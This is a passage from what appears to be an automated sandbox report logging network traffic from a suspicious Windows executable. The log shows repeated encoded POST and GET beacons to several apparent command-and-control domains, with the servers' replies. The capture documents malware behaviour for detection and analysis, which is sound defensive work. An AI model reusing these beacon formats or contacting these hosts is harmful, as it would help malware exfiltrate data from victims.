                                                                                                                                  Data Ascii: DrelH=mmiLmwXyfZXgbV6M8VajdWDso9OWALZ3vwJID5vM9v4pWY+7K2zyiVaUAIq36p88Eo1vawoikfQCtZvYikKLJ196S0A1yFfVtAnUNvO5BzpOcOGIm61suwJ5Odx5hdyWhTvgGXW/zLd1ykKcosAREZt6a4lutpyZQ5eYw521e+qf2OBeY0Pmoq7hrYYfFT212EHwEHSeYnyKLCpHSbVtxSA489ICbA+e246I0832XPDgCtYriwP1NWqtEmGadmvGDH+glhhIdhjFGaEqrERqJzaKP000ckqh6S/qA2xSU1OH0dVos8/UdBJks99wtOh/D3ha7+sAiVoOAHDnFnjxuu8bpeGR4h0QlmY4imSkRTaIkkh9JGB2iG5gJeUPel17cM4QsyeL2Mh5btwdDpeZJBrwVU48KpTpyI/xJr3KUbMnWOsD5lnUl+hB9gE+zJ1JeXYTZp1PoVsG+H0+wtk8O2Eq1Pau3hquvmCHr8jyo3Q2PHr0ZieVAZRhdixn0WfokUav9UebmmBh5Zsh6zMsCz/3a7dtptgCOY3/sZlIVIomP/fp8cK7695MwSfQfJdmK2Vvv3GY0+tdVD1SQgsrkBl3nPKQVMGyTxedj9ltLWCnzR9PzmzYLUxQkeFqheSrja0WIljPgIamlZ/cisSYFqiSTJyMKGOEG3iNVMCBBuxcmHiHWOl3prn60SbHxZwyJuMw7aRWQ7mAVOfWlKP0+BFvj/YfgHewy15LJdAadb8igLSJQPK3uarzyIBgDlToI5VIuuPz00yJfr3vUJZ/P0zX0YidzbmqTppSV75p/CyEDAF6mDHQCVWgaSlc4TmpQYIx3Nzc7O35hkPgsuAmO343aHXJpDv1aVxvGS0hRweVC3ubAIVpMIPQUJ0AlaRKyWzFTzyBJw1pRpcxFsChl3cWsVv5PFcn+x+m785bpc4KH7bYkqrY90RE1y7wF2BOeuenzXf7oqlUiOZgr41YuyHnbvxX1u2nwbbLKGDCJyO2Sd [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  44192.168.2.5532473.33.130.190801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:18.636172056 CEST481OUTGET /12c7/?Sx=gnM4ZH&DrelH=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqOWVPblob6mrlgni+LdLmL1Exd/23ibR2hwRjCv5+3cT01Q== HTTP/1.1
                                                                                                                                  Host: www.booosted.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:59:19.319845915 CEST403INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:19 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 263
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 78 3d 67 6e 4d 34 5a 48 26 44 72 65 6c 48 3d 72 6b 4b 72 6c 41 65 38 50 4d 33 32 52 6c 79 72 34 79 69 62 41 78 44 77 37 4b 47 4b 4b 4d 49 39 6c 6a 52 33 45 71 72 6a 35 63 59 48 59 62 4f 34 49 67 4c 2f 76 43 61 66 56 71 37 36 78 73 49 57 4f 4d 31 52 59 52 34 68 31 75 73 4e 36 74 36 72 68 67 4c 71 4f 57 56 50 62 6c 6f 62 36 6d 72 6c 67 6e 69 2b 4c 64 4c 6d 4c 31 45 78 64 2f 32 33 69 62 52 32 68 77 52 6a 43 76 35 2b 33 63 54 30 31 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sx=gnM4ZH&DrelH=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqOWVPblob6mrlgni+LdLmL1Exd/23ibR2hwRjCv5+3cT01Q=="}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  45192.168.2.5532488.210.49.139801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:25.082164049 CEST747OUTPOST /0628/ HTTP/1.1
                                                                                                                                  Host: www.djazdgc.tokyo
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.djazdgc.tokyo
                                                                                                                                  Referer: http://www.djazdgc.tokyo/0628/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6a 66 39 76 76 70 6b 70 59 58 42 6d 79 74 6d 32 4a 5a 35 4a 51 41 7a 61 7a 50 43 42 74 59 2f 74 50 51 4a 75 45 55 67 75 66 56 65 45 39 5a 35 76 54 65 37 7a 2b 6f 72 4f 49 5a 61 43 57 33 47 2b 57 44 38 70 69 4f 68 69 59 61 41 42 78 39 44 2b 76 4d 62 50 46 7a 4d 51 5a 62 73 62 4a 74 6b 62 42 67 73 51 42 6b 6c 47 39 4c 6b 30 4f 6a 4e 42 59 68 32 35 61 55 67 6e 6f 48 78 62 7a 78 62 72 6b 47 67 54 79 48 4c 50 6f 64 73 5a 48 4c 4c 31 58 6c 78 4a 77 72 38 54 75 74 6a 35 4b 41 6f 32 49 6f 52 75 76 49 2b 71 39 49 45 63 41 41 52 44 38 55 32 4f 35 43 56 69 5a 6f 65 51 49 34 77 67 33 62 58 2b 34 31 6f 3d
                                                                                                                                  Data Ascii: DrelH=jf9vvpkpYXBmytm2JZ5JQAzazPCBtY/tPQJuEUgufVeE9Z5vTe7z+orOIZaCW3G+WD8piOhiYaABx9D+vMbPFzMQZbsbJtkbBgsQBklG9Lk0OjNBYh25aUgnoHxbzxbrkGgTyHLPodsZHLL1XlxJwr8Tutj5KAo2IoRuvI+q9IEcAARD8U2O5CViZoeQI4wg3bX+41o=
                                                                                                                                  Oct 22, 2024 22:59:26.181091070 CEST507INHTTP/1.1 200
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:25 GMT
                                                                                                                                  Content-Type: application/json;charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Origin
                                                                                                                                  Vary: Access-Control-Request-Method
                                                                                                                                  Vary: Access-Control-Request-Headers
                                                                                                                                  Access-Control-Allow-Origin: http://www.djazdgc.tokyo
                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 54{"msg":"/0628/","code":401}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  46192.168.2.5532498.210.49.139801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:27.624110937 CEST767OUTPOST /0628/ HTTP/1.1
                                                                                                                                  Host: www.djazdgc.tokyo
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.djazdgc.tokyo
                                                                                                                                  Referer: http://www.djazdgc.tokyo/0628/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6a 66 39 76 76 70 6b 70 59 58 42 6d 30 35 69 32 4d 36 52 4a 53 67 7a 62 71 50 43 42 69 34 2f 70 50 51 56 75 45 56 6b 2b 59 6e 4b 45 39 35 4a 76 53 62 48 7a 2f 6f 72 4f 63 4a 61 48 5a 58 47 50 57 43 41 50 69 4d 6c 69 59 61 55 42 78 35 50 2b 73 39 62 4d 4b 44 4d 53 57 37 73 64 47 4e 6b 62 42 67 73 51 42 6b 78 2f 39 4c 4d 30 4f 77 56 42 5a 46 71 36 58 30 67 67 38 58 78 62 35 52 62 76 6b 47 68 30 79 47 6e 6c 6f 66 45 5a 48 4f 33 31 55 33 5a 4f 70 62 39 57 6a 4e 69 46 62 78 31 38 4f 65 46 79 79 36 50 4f 72 70 41 33 46 32 38 70 6d 32 2b 6d 71 69 35 61 4a 37 57 6e 5a 49 52 4a 74 34 48 4f 6d 69 2b 46 34 49 50 6c 56 77 72 4d 49 39 4c 45 30 71 47 53 55 39 6c 53
                                                                                                                                  Data Ascii: DrelH=jf9vvpkpYXBm05i2M6RJSgzbqPCBi4/pPQVuEVk+YnKE95JvSbHz/orOcJaHZXGPWCAPiMliYaUBx5P+s9bMKDMSW7sdGNkbBgsQBkx/9LM0OwVBZFq6X0gg8Xxb5RbvkGh0yGnlofEZHO31U3ZOpb9WjNiFbx18OeFyy6POrpA3F28pm2+mqi5aJ7WnZIRJt4HOmi+F4IPlVwrMI9LE0qGSU9lS
                                                                                                                                  Oct 22, 2024 22:59:28.596154928 CEST507INHTTP/1.1 200
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:28 GMT
                                                                                                                                  Content-Type: application/json;charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Origin
                                                                                                                                  Vary: Access-Control-Request-Method
                                                                                                                                  Vary: Access-Control-Request-Headers
                                                                                                                                  Access-Control-Allow-Origin: http://www.djazdgc.tokyo
                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 54{"msg":"/0628/","code":401}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  47192.168.2.5532508.210.49.139801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:30.170933962 CEST1784OUTPOST /0628/ HTTP/1.1
                                                                                                                                  Host: www.djazdgc.tokyo
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.djazdgc.tokyo
                                                                                                                                  Referer: http://www.djazdgc.tokyo/0628/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6a 66 39 76 76 70 6b 70 59 58 42 6d 30 35 69 32 4d 36 52 4a 53 67 7a 62 71 50 43 42 69 34 2f 70 50 51 56 75 45 56 6b 2b 59 6e 79 45 39 4b 42 76 51 34 76 7a 6c 6f 72 4f 66 4a 61 47 5a 58 47 53 57 44 6f 54 69 4d 70 79 59 59 73 42 77 63 54 2b 6e 70 48 4d 52 7a 4d 53 55 37 73 59 4a 74 6b 4f 42 67 38 55 42 6b 68 2f 39 4c 4d 30 4f 78 6c 42 4e 68 32 36 45 6b 67 6e 6f 48 78 58 7a 78 62 58 6b 48 46 4f 79 47 54 66 6f 50 6b 5a 45 75 48 31 48 7a 35 4f 32 72 39 59 67 4e 69 64 62 78 35 2f 4f 61 6c 2b 79 36 58 67 72 75 4d 33 45 54 39 6d 78 53 75 2f 38 52 46 65 45 4c 75 63 4e 76 4d 6b 71 4b 58 79 6a 53 75 36 36 37 7a 54 57 51 66 52 64 49 69 44 6e 39 2b 6d 51 71 67 4f 45 49 35 4b 57 44 4b 53 6a 31 55 4d 38 62 56 52 43 4f 77 39 4a 4e 31 32 35 4a 6f 59 74 54 4b 51 2f 6a 6b 65 38 46 76 72 7a 79 7a 73 73 43 43 35 6e 42 72 50 70 53 68 38 36 6e 38 76 67 46 39 70 5a 4c 6d 52 4c 51 41 68 71 63 38 32 4e 68 62 77 74 68 7a 75 74 54 43 5a 2f 68 6d 51 51 4a 37 61 6b 65 6d 70 6f 6a 51 47 54 76 30 74 4a 31 6a 64 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=jf9vvpkpYXBm05i2M6RJSgzbqPCBi4/pPQVuEVk+YnyE9KBvQ4vzlorOfJaGZXGSWDoTiMpyYYsBwcT+npHMRzMSU7sYJtkOBg8UBkh/9LM0OxlBNh26EkgnoHxXzxbXkHFOyGTfoPkZEuH1Hz5O2r9YgNidbx5/Oal+y6XgruM3ET9mxSu/8RFeELucNvMkqKXyjSu667zTWQfRdIiDn9+mQqgOEI5KWDKSj1UM8bVRCOw9JN125JoYtTKQ/jke8FvrzyzssCC5nBrPpSh86n8vgF9pZLmRLQAhqc82NhbwthzutTCZ/hmQQJ7akempojQGTv0tJ1jdqqL7YqBot5pufpKNFnUmJ7dQx9nSDmDrpMWI+W1JxqtZkF1s0qOonvyV2FVn1A7ghhW5u1EMcAgUSjF87ZovWw3gE8+BH1lztZilLWSIdqytljPmuVOdB05Vflq8i/eOPLCpBwdL/GTEN7BkqvOU6oQMhaz1pob/J2hxPqGfOYVtrXLgNlvH2HcEg02VOWmoXfIbNNgfRpnNx2Cuo2MZHoANgZDT54gQ2mljnpyk78JKejJr73NPxPcCD5zNIAx6pgOwj7zJfzLCImyhRbzAnjNJDnSV3YHLyDAzs6Alpv7oLpU8QGpkZ6FT5WdsyPJ82DySYogSlxIrR+A5wZdngzO8D7mexYCBzBaNvdUSfjR+MMkuvfKrtaF48b6eGrPzquvfXOiJctrHF7r/R8LB6gBHP3OM1sNic+JMJjjcLwilupjFpNQopbQLR6tP/qcMk4YsvoibS21lPYdKBZ+XQ55oCIr92sz3V0ONmFyNWrvaiUyU/dFPK+xgHAeuMTVhoInUGHCK+A9LaW2cGzc5NYagT9rfxC6XEXbRl+xvY4Fgu6HO4Of2p4AJhHeLPKzYwJ44k+awuczsK6pl6R2tpEe6dcNwhuBv169jShq8jaNyf6veCyXS9iOZOAyPpPOA22bXsmJN7MLEMQyNaNjd65YMhQbYEwc8Wm [TRUNCATED]
                                                                                                                                  Oct 22, 2024 22:59:31.178041935 CEST507INHTTP/1.1 200
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:31 GMT
                                                                                                                                  Content-Type: application/json;charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Origin
                                                                                                                                  Vary: Access-Control-Request-Method
                                                                                                                                  Vary: Access-Control-Request-Headers
                                                                                                                                  Access-Control-Allow-Origin: http://www.djazdgc.tokyo
                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 54{"msg":"/0628/","code":401}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  48192.168.2.5532518.210.49.139801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:32.714939117 CEST482OUTGET /0628/?DrelH=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+AigTeJIoAagnD1dxA2tH0NgWMQZxZA+Ob34DrkJtsSinzg==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.djazdgc.tokyo
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:59:33.673523903 CEST422INHTTP/1.1 200
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:33 GMT
                                                                                                                                  Content-Type: application/json;charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Origin
                                                                                                                                  Vary: Access-Control-Request-Method
                                                                                                                                  Vary: Access-Control-Request-Headers
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  X-Cache: MISS
                                                                                                                                  Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                                                                  Data Ascii: 54{"msg":"/0628/","code":401}
                                                                                                                                  Oct 22, 2024 22:59:33.673578024 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  49192.168.2.55325294.23.162.163801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:39.097224951 CEST768OUTPOST /9vwi/ HTTP/1.1
                                                                                                                                  Host: www.productanalytics.pro
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.productanalytics.pro
                                                                                                                                  Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 53 4c 58 52 73 6f 46 34 6a 65 35 4a 45 67 36 34 73 68 38 56 39 49 6d 64 6d 35 45 79 33 2f 32 42 50 36 59 78 56 5a 4f 65 34 36 38 76 5a 47 46 47 34 56 63 48 61 71 53 45 63 75 58 42 61 30 33 33 59 32 77 46 57 41 66 43 4a 44 5a 37 48 6d 36 35 78 51 2f 71 58 39 49 70 68 6a 4f 50 65 74 58 77 76 2b 61 5a 68 48 34 78 59 6c 68 55 70 34 4a 32 44 65 33 36 68 31 79 51 67 68 6b 4f 54 32 44 35 44 49 44 49 6d 43 79 75 54 54 64 68 44 4e 30 65 64 45 78 38 6d 51 37 2f 4e 75 62 77 2b 79 70 74 4d 65 31 37 52 53 44 58 38 67 73 63 57 57 31 65 49 57 46 7a 47 35 30 4b 6d 7a 30 3d
                                                                                                                                  Data Ascii: DrelH=qxonD4gQFvLySLXRsoF4je5JEg64sh8V9Imdm5Ey3/2BP6YxVZOe468vZGFG4VcHaqSEcuXBa033Y2wFWAfCJDZ7Hm65xQ/qX9IphjOPetXwv+aZhH4xYlhUp4J2De36h1yQghkOT2D5DIDImCyuTTdhDN0edEx8mQ7/Nubw+yptMe17RSDX8gscWW1eIWFzG50Kmz0=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  50192.168.2.55325394.23.162.163801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:41.895153999 CEST788OUTPOST /9vwi/ HTTP/1.1
                                                                                                                                  Host: www.productanalytics.pro
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.productanalytics.pro
                                                                                                                                  Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 54 76 54 52 75 4a 46 34 6d 2b 35 4b 64 67 36 34 6c 42 39 39 39 49 69 64 6d 37 6f 69 33 4a 65 42 4d 66 6b 78 57 64 61 65 2f 36 38 76 57 6d 45 4f 6c 46 63 4d 61 72 75 32 63 73 44 42 61 30 54 33 59 30 34 46 57 7a 33 4e 62 44 5a 39 50 47 36 33 31 51 2f 71 58 39 49 70 68 6a 4b 6c 65 70 7a 77 76 76 71 5a 75 43 4d 77 45 56 68 58 75 34 4a 32 48 65 33 2b 68 31 79 35 67 67 34 30 54 79 7a 35 44 4a 54 49 6d 51 61 74 64 6a 64 37 4d 74 31 52 4d 52 4d 7a 67 68 50 4f 4d 6f 71 66 6e 30 64 46 45 49 59 52 4c 77 4c 2f 76 41 41 6b 47 46 39 70 5a 6d 6b 61 63 61 6b 36 34 6b 69 73 69 4f 37 37 48 47 36 47 56 7a 33 61 47 4e 55 52 46 4d 32 38
                                                                                                                                  Data Ascii: DrelH=qxonD4gQFvLyTvTRuJF4m+5Kdg64lB999Iidm7oi3JeBMfkxWdae/68vWmEOlFcMaru2csDBa0T3Y04FWz3NbDZ9PG631Q/qX9IphjKlepzwvvqZuCMwEVhXu4J2He3+h1y5gg40Tyz5DJTImQatdjd7Mt1RMRMzghPOMoqfn0dFEIYRLwL/vAAkGF9pZmkacak64kisiO77HG6GVz3aGNURFM28


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  51192.168.2.55325494.23.162.163801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:44.436575890 CEST1805OUTPOST /9vwi/ HTTP/1.1
                                                                                                                                  Host: www.productanalytics.pro
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.productanalytics.pro
                                                                                                                                  Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 54 76 54 52 75 4a 46 34 6d 2b 35 4b 64 67 36 34 6c 42 39 39 39 49 69 64 6d 37 6f 69 33 4a 6d 42 4d 74 63 78 56 36 32 65 2b 36 38 76 66 47 45 4e 6c 46 63 52 61 71 47 79 63 73 50 52 61 32 62 33 5a 57 41 46 51 43 33 4e 52 44 5a 39 44 6d 36 36 78 51 2f 2f 58 39 35 69 68 6a 61 6c 65 70 7a 77 76 74 79 5a 70 58 34 77 58 46 68 55 70 34 4a 36 44 65 33 47 68 31 61 49 67 67 39 57 55 42 37 35 43 6f 6a 49 71 44 79 74 66 44 64 6c 4a 74 30 4f 4d 52 4a 7a 67 68 69 33 4d 73 69 6d 6e 7a 70 46 55 4f 41 4d 4f 6a 57 6d 72 47 59 66 4b 69 39 2b 5a 6d 38 52 5a 59 70 4b 79 33 32 51 2f 66 58 6b 48 47 65 42 5a 51 57 55 61 72 49 68 49 4c 4c 79 50 77 5a 49 34 58 73 61 54 4f 4b 4d 67 63 79 6c 68 6b 58 47 70 32 68 77 57 35 71 38 67 6a 7a 79 41 50 56 61 65 6b 48 47 45 70 38 75 77 74 41 35 48 62 30 5a 62 41 6b 75 68 79 54 79 71 6a 4f 49 57 69 49 47 6a 42 72 4f 70 78 43 71 45 39 4f 6b 74 7a 72 33 45 6d 48 62 68 6c 61 4d 68 4a 69 48 2f 63 36 58 4d 42 71 4d 50 33 35 69 75 75 4b 76 [TRUNCATED]
